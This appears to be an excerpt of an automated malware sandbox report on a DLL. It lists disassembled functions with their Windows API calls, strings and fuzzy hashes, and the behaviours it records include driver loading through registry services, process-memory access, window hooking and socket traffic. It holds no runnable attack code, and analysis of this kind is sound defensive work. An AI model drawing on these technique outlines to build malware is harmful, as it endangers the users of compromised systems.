                                                                                                                                      • API ID: Memory$Process$Virtual$AllocateCloseHandleInformationModule32OpenQueryReadSystem_memset$AdjustCreateFirstFreeNextPrivilegeSnapshotToolhelp32
                                                                                                                                      • String ID: $2$2$Bass.dll$G$H$I$M$U$d$e$i$i$o$t$u
                                                                                                                                      • API String ID: 736719229-977268173
                                                                                                                                      • Opcode ID: a5c7673c8602b1e68b392c76cd82a9ecdbc4a01197a8551b95b7eb40232b8444
                                                                                                                                      • Instruction ID: 4bc835c312ad0193db62c6309ebcce7472e4ac1b7349bd6a26654934037fc595
                                                                                                                                      • Opcode Fuzzy Hash: a5c7673c8602b1e68b392c76cd82a9ecdbc4a01197a8551b95b7eb40232b8444
                                                                                                                                      • Instruction Fuzzy Hash: 3E417D6110C3C09DD312C6689844B5FBFD55FAA61CF184A5DF1D866282D7BACA08C77B
                                                                                                                                      Function 69EBA875 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 69EBA87F
                                                                                                                                        • Part of subcall function 69EB51C5: __EH_prolog3.LIBCMT ref: 69EB51CC
                                                                                                                                      • CallNextHookEx.USER32(?,?,?,?), ref: 69EBA8C3
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 69EBA907
                                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 69EBA931
                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,Function_00039754), ref: 69EBA986
                                                                                                                                      • _memset.LIBCMT ref: 69EBA9D0
                                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 69EBAA00
                                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 69EBAA21
                                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 69EBAA45
                                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 69EBAA5F
                                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 69EBAA6A
                                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 69EBAA72
                                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 69EBAA7A
                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,Function_0003A728), ref: 69EBAA88
                                                                                                                                      • CallNextHookEx.USER32(?,00000003,?,?), ref: 69EBAAA0
                                                                                                                                      • UnhookWindowsHookEx.USER32(?), ref: 69EBAAB4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                      • API String ID: 1191297049-4034971020
                                                                                                                                      • Opcode ID: 8206dd10c1ef5cc0554e8ad1fcdd4754b2eaf660ee24781f8cf6896a914c2681
                                                                                                                                      • Instruction ID: 4586fcb57de2ab88079d7b9d80958dcca3fdd0b1a43316b283a3191809278c7d
                                                                                                                                      • Opcode Fuzzy Hash: 8206dd10c1ef5cc0554e8ad1fcdd4754b2eaf660ee24781f8cf6896a914c2681
                                                                                                                                      • Instruction Fuzzy Hash: BC61E431880259EBDF229B60DF49BDE3BB8BF05339F200155F515AB294DB30CA85CBA1
                                                                                                                                      Function 69E87BB0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 129registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87BEA
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E87C07
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E87C56
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000004,ErrorControl,00000000,00000004,00000004,00000004), ref: 69E87C6C
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000004,Start,00000000,00000004,00000004,00000004), ref: 69E87C82
                                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000100,?,00000000), ref: 69E87C93
                                                                                                                                      • _printf.LIBCMT ref: 69E87CA6
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87CBD
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000001,ImagePath,00000000,00000001,?,00000000,00000000,00000004,?,00000004), ref: 69E87CDC
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E87CE3
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87CF4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$_sprintf$CloseCreateFullNamePath_printf
                                                                                                                                      • String ID: ErrorControl$ImagePath$Loading driver: %s$Start$System\CurrentControlSet\Services\%s$Type$\??\%s$\Registry\Machine\System\CurrentControlSet\Services\%s
                                                                                                                                      • API String ID: 2939469090-2692958318
                                                                                                                                      • Opcode ID: 63a60a009be2851b66e1dcd2f5d2cf41c759ebff7b3c0bd6f01975f027f1da7b
                                                                                                                                      • Instruction ID: de3d3c31959ef7741aefae268aae9fe32555079b3a2ea63e1c9cf9ed0adaaa6e
                                                                                                                                      • Opcode Fuzzy Hash: 63a60a009be2851b66e1dcd2f5d2cf41c759ebff7b3c0bd6f01975f027f1da7b
                                                                                                                                      • Instruction Fuzzy Hash: 0241C0B2548380AFD310DB64DC40EAFB7ECAF88708F548D1DF69993141E674E608CBA6
                                                                                                                                      Function 69E9DA10 Relevance: 33.3, APIs: 4, Strings: 15, Instructions: 90libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 69E9DB00
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9DB27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Handle$AddressCloseModuleOpenProcProcess
                                                                                                                                      • String ID: I$N$P$Q$c$d$e$e$f$mneN$n$n$n$u$y
                                                                                                                                      • API String ID: 4274107956-1996571842
                                                                                                                                      • Opcode ID: 98aa88b27f18380447ab15afe4b9e43f7fa9592614a8b9d19694557a829132ad
                                                                                                                                      • Instruction ID: 15f1be7891a77754f0970723201a5eef65e04e77a2e61f8e830b4d561816a2e8
                                                                                                                                      • Opcode Fuzzy Hash: 98aa88b27f18380447ab15afe4b9e43f7fa9592614a8b9d19694557a829132ad
                                                                                                                                      • Instruction Fuzzy Hash: B631272550D3C0AED352CB28848475FBFE51FA6718F88198EF1D45B382C6A6C658C767
                                                                                                                                      Function 69E883B0 Relevance: 31.7, APIs: 4, Strings: 14, Instructions: 194COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E8B440: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,69EF2C98), ref: 69E8B4EA
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E88424
                                                                                                                                      • OutputDebugStringA.KERNEL32(wrong list), ref: 69E8843E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E88445
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$CriticalInitializeSection__wfopen_s
                                                                                                                                      • String ID: 11948$11965$24624$24647$C:\debug.txt$c3b39858cd5cd.zip$da1b4f0857d.zip$ded12271319.zip$j9a03b4151b3e00ffc9.zip$loser.rar$loser32.rar$loser64.rar$loser64_2.rar$wrong list
                                                                                                                                      • API String ID: 871686837-3486113860
                                                                                                                                      • Opcode ID: 8707cda5812bc588b645065eb386bc680204291296bc984c1f422717efd0821d
                                                                                                                                      • Instruction ID: d21e2b4a774bc30a76dd8aef2abb3381d45c688b4b55b6f41ce33ae7f4bff14e
                                                                                                                                      • Opcode Fuzzy Hash: 8707cda5812bc588b645065eb386bc680204291296bc984c1f422717efd0821d
                                                                                                                                      • Instruction Fuzzy Hash: BE51027AA0410197D701D7F86B1A65E3AA56F4134CB74D86BDC7D9F302FB32C90A82D2
                                                                                                                                      Function 69E91CB0 Relevance: 28.8, APIs: 19, Instructions: 258networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: htons$_memsetclosesocket$Startup_strncpyinet_addrrecvfromsendtosocket
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2284631015-0
                                                                                                                                      • Opcode ID: a2bf0f2d9520e596d4ddbe87b23acce8e4d7f1ecb3e8c642aeb9a262e26b7f0d
                                                                                                                                      • Instruction ID: 17453105bb1d8665ed0fab812c78923af3e62aa206e9c7387ec1940bf087ac2c
                                                                                                                                      • Opcode Fuzzy Hash: a2bf0f2d9520e596d4ddbe87b23acce8e4d7f1ecb3e8c642aeb9a262e26b7f0d
                                                                                                                                      • Instruction Fuzzy Hash: B691DD755183419FC301CFA8C885BABBBE9FF8A348F50492DF5968B241EB71E509C792
                                                                                                                                      Function 69E90050 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 487COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E902F5
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E90377
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E903FB
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E90474
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E9048D
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E904A7
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E904C1
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E904FE
                                                                                                                                        • Part of subcall function 69EA7760: std::locale::facet::facet.LIBCPMTD ref: 69EA77D4
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E90594
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E905AD
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E905C7
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E905E1
                                                                                                                                      • std::ios_base::clear.LIBCPMTD ref: 69E9061E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::ios_base::clear$std::locale::facet::facet
                                                                                                                                      • String ID: Answer$data$type
                                                                                                                                      • API String ID: 505427035-2650445777
                                                                                                                                      • Opcode ID: 0198f524d48a047adcbd796dec4a50ef3a1b2053b20f9e60d2becfac5e6be4a3
                                                                                                                                      • Instruction ID: 2ecaa34ca5f2fbad91fe23d2547f4071dd9a9a8e2aba2f3900b8dc33b81eb3f4
                                                                                                                                      • Opcode Fuzzy Hash: 0198f524d48a047adcbd796dec4a50ef3a1b2053b20f9e60d2becfac5e6be4a3
                                                                                                                                      • Instruction Fuzzy Hash: C512C5344183808FD715DB68C890B9FB7E4BFD5328F648A5CE4994B2A1DF319609CB93
                                                                                                                                      Function 69E9DEA0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 197fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _sprintf.LIBCMT ref: 69E9DF7A
                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 69E9DF93
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 69E9DFA2
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 69E9DFB0
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,-00000004,00000000,00000000,?,?), ref: 69E9DFC4
                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?), ref: 69E9DFE7
                                                                                                                                      • _memset.LIBCMT ref: 69E9E000
                                                                                                                                      • _sprintf.LIBCMT ref: 69E9E043
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,-00000004,00000000,00000000), ref: 69E9E0AC
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 69E9E0C4
                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 69E9E0D9
                                                                                                                                      • FlushFileBuffers.KERNEL32(00000000), ref: 69E9E0E0
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9E0E7
                                                                                                                                      Strings
                                                                                                                                      • %c%c, xrefs: 69E9DF6E
                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 69E9DEC4
                                                                                                                                      • dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d, xrefs: 69E9E03D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Pointer$CloseHandle_sprintf$BuffersCreateFlushReadSizeWrite_memset
                                                                                                                                      • String ID: %c%c$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d
                                                                                                                                      • API String ID: 1255100760-368882477
                                                                                                                                      • Opcode ID: 5ea6c488d64afe8fbdee6ce93a11fd1fbe863b59cb8fa0b90542c8b618f9bd59
                                                                                                                                      • Instruction ID: 3a5f0ae495cf5160ae3055c336b51271fb17d6834f1d6f92096226de32d9aeaa
                                                                                                                                      • Opcode Fuzzy Hash: 5ea6c488d64afe8fbdee6ce93a11fd1fbe863b59cb8fa0b90542c8b618f9bd59
                                                                                                                                      • Instruction Fuzzy Hash: 9B61F57110C7D09AE316DB248C84B7FBEEAAFCA308F04495DF2D596182D669C60887A7
                                                                                                                                      Function 69E881A3 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 124COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
